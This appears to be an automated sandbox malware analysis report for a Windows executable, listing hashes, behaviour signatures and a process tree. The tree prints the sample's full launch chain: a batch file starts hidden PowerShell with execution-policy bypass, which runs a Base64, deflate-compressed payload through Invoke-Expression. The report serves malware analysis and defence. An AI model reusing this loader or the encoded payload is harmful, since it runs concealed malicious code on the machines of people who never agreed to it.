dd6e2033cd45addc571cbb7eba7c6ad3b80e172f26f29256d6f2aacf94eaf4d8

Analysis

max time kernel
117s
max time network
122s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
21/04/2024, 05:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fe874a810919c2453e9723f6716a46f4_JaffaCakes118.exe
Size

90KB
MD5

fe874a810919c2453e9723f6716a46f4
SHA1

9119d485911ea46515ac4e46d35599b1e16b918f
SHA256

dd6e2033cd45addc571cbb7eba7c6ad3b80e172f26f29256d6f2aacf94eaf4d8
SHA512

53abeb877a9a3ad139056b667ad16a9d12b97b7bae31440a44a5c27d030ef3f23bd66740cbd50fc184dcb84bb1ed4c926b3a2911f1bb8441a53e045d08feb98f
SSDEEP

1536:IM7ftfkS5g9YOms+gZcQipICdXkNDqLLZX9lItVGL++eIOlnToIfMwM5HOB:ICFfHgTWmCRkGbKGLeNTBfMI

Score

1^/10

Malware Config

Signatures

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2996	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2996	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2996	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1524 wrote to memory of 2148	1524	fe874a810919c2453e9723f6716a46f4_JaffaCakes118.exe	29
PID 1524 wrote to memory of 2148	1524	fe874a810919c2453e9723f6716a46f4_JaffaCakes118.exe	29
PID 1524 wrote to memory of 2148	1524	fe874a810919c2453e9723f6716a46f4_JaffaCakes118.exe	29
PID 1524 wrote to memory of 2148	1524	fe874a810919c2453e9723f6716a46f4_JaffaCakes118.exe	29
PID 2148 wrote to memory of 2996	2148	cmd.exe	30
PID 2148 wrote to memory of 2996	2148	cmd.exe	30
PID 2148 wrote to memory of 2996	2148	cmd.exe	30
PID 2148 wrote to memory of 2996	2148	cmd.exe	30

C:\Users\Admin\AppData\Local\Temp\fe874a810919c2453e9723f6716a46f4_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\fe874a810919c2453e9723f6716a46f4_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1524
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\69CB.tmp\69CC.tmp\69CD.bat C:\Users\Admin\AppData\Local\Temp\fe874a810919c2453e9723f6716a46f4_JaffaCakes118.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2148
- - C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe
    C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe -EncodedCommand -ExecutionPolicy -Noninteractive -NoProfile -W Hidden Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"zVZtb9pIEP7OrxhZe6rdYMcESpNYSE1J03ItaS6QpHcIVYu9wDbrXWe9TqCU/35jbN7SL1U/nE5I2Lue2Xl75pklD9CCN1ZlcC5EJ06UNrZ1z7Rkon7kRUJYzhCSbCR4CKmhBh9sZvA7dKS5MhpuuTYZFWdCqNAu90RyFkWapWkVMi4NRE89/p2Vi3Ehi0cp2Z8n2+0rrQwLjRP8ti9tzahh/Sk+oq0vxfrMGM1HmWE7Thka3heebYRxT5uN95vtK6ppzNDWRnllC0O4EHSyK1lY60QYhvWmwse2/Z4Z967b+Tz6htGB2xY0TeGOy/rRVww5RENKO95lFo+Y/jz+pCY8pGLzJQV3wqDmwKIyeDs3bDAcksv+VV9TmcbctKq1l43jYHdr4A9b/qz2NtjIpyxUMnqusr+70SJSnYW57RYZU5GyoK/nC9JT4T0zrUv25JaBXDLjFbtp+bQHu3tlEi9ozMV8eHqKGWIaBZ6Uvq8OftbOsYBi5xPM9P73HBgqVKKUuIkSJygd8tpKSvTGfpGlXqKU8KRJPKUnL6q1o7oTDG4Vj4Zr4R6Tkb2bqucC1yxk/JHtyywRq+F0sZMXozO2DIjOZF8ZKlp+cKH0OxpObdKREZsBl7BXkYbveY360FlsdTZvL49eNQ8KPTxzzHVq+jxmLXsn1+c5rHHTrp34frWGP3/1G6w/fOQyylNjQsfJM9/lQvCiwKk9uMHcNxtDe2uz5vs+SvZWEsEK9G5PMJaAm0KtXtQcHcjz8j8qeunRL1Z9LV2UfR/uPwltSv9cbmtUqJTZvwuHZ932q4hABgH7v4MCuLCFYME8dXCVhk24ORGZHB0Rzg3r7G37/N3F+w+dPz9+6l5+vvrrute/ub378vc/dBRGbDyZ8m/3IpYqecBDs8en2fy7jzVqvGq+Pj6xvL5qT6k+05rObacyzmSYcyqENnl0FqCZyZDdbXuAnItEBuRxXwN+QJfRNNNsnR63l8UYTBbDH4B05vvgsgc4OXKW29MNLMg4994Kap5X/zFWSNnh1FWrI/DbQQtINLAnSNxYr0jF4MZ0xmM8lUTeJyYnZuoMl0HpHxkHO6czWEBSsDcsBjR3dEhmaA7/DoB8XQaAeEQXZug9Erwp7cLClljmcnG9sut4EiccYm65Y2CyAPQYbMIRaYSDKww0G/h2cIBwmqIlE5D73GCEFlgAUAaIKmKFxXuUS3OBae6RCCAHGeY8dbC666yjBJotF9bJ45cbC8MsepTpRx6yK4Vl6VJJJ0wj4vJdpttMGz7GEWbYLRU8Wg3JNhVihMMWbS7W7RLjYgfXvXlqWOzlx9+xUVtwJk1QIbH3Accp0ytqsa0sZdpFe9JYVbC66juCmx42PB/9V3GCxkYCI+72Ou+g6dWCfM5G6imFy75jYS9LNDoJYD0ZgSR5GmLvXD1JoWiETURta2pMkp4eHtZeH3k1PKZ57NXq/umxf+wfEmmBUyEK9dAjN6cnRAfLh/c5G3PJVzUiD+Be4o0BrNWgt8CVuEoTGrJi9F+U1cTxnuB9wEx1ViGzFlGnp3s3Kr9KkhJxVX9Wx17FR8NH+ioTdp1Jg73qrZhWJWVpUq9LdTqlAuvSVsncJkkV/CoMinsK9v8MOwkX9SPbcaqwMZKHhiq7F6mcXcisoJm841RmXJkJhM3e3CgJ5LjZ8P2SI5f/Ag==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2996

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\69CB.tmp\69CC.tmp\69CD.bat

Filesize
2KB

MD5
5f09183586480dccf9fece371e9e7658

SHA1
6ec0e7ffe68a2903720fb759d303ef9353156fdf

SHA256
be59bce0a84c42b1387aa2d4aedac1a08a84a90cba9333b0f5e9c632e998a605

SHA512
cb04862075f911a4bb156bd172f733da0b18f2ee5043ecf50cfc46cdc0a921b8bfe64fedfffc08a5fdf5246087a89e74598d8cfe1448bd79d8078ca18576cdbb

Download Submit
memory/2996-4-0x0000000074400000-0x00000000749AB000-memory.dmp

Filesize
5.7MB

Download
memory/2996-5-0x0000000074400000-0x00000000749AB000-memory.dmp

Filesize
5.7MB

Download
memory/2996-6-0x0000000000630000-0x0000000000670000-memory.dmp

Filesize
256KB

Download
memory/2996-7-0x0000000000630000-0x0000000000670000-memory.dmp

Filesize
256KB

Download
memory/2996-8-0x0000000074400000-0x00000000749AB000-memory.dmp

Filesize
5.7MB

Download